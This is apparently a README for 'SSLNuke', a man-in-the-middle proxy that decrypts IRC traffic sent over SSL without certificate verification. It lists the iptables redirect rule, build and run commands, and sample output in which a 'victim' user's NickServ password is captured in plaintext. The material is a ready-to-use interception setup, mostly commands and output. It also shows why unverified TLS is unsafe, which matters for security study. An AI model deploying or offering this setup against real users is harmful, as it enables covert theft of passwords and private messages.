

SSLNuke is a program designed for decrypting and intercepting "secured" but non-verified IRC traffic. It is basically a transparent proxy that decrypts SSL traffic and prints out IRC messages.

Usage:

# useradd -s /bin/bash -m sslnuke # grep sslnuke /etc/passwd sslnuke:x:1000:1000::/home/sslnuke:/bin/bash # iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \ --dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

# su -l sslnuke # cd sslnuke # make # ./sslnuke

[*] Received connection from: 192.168.0.5:58007 [*] Opening connection to: 1.1.1.1:6697 [*] Connection Using SSL! [*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname... [*] irc.com -> AUTH (1.1.1.1): *** Found your hostname [*] irc.com -> victim (1.1.1.1): *** You are connected to irc.vps-heaven.com with TLSv1.2-AES256-GCM-SHA384-256bits [*] 192.168.0.5 -> nickserv (192.168.0.5): id hello [*] NickServ!services@irc.com -> victim (1.1.1.1): Password accepted - you are now recognized.

First, add a user account for SSLNuke to run as and add IP tables rules to redirect traffic to it:Finally, login as SSLNuke, build, and run SSLNuke:Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on SSLNuke.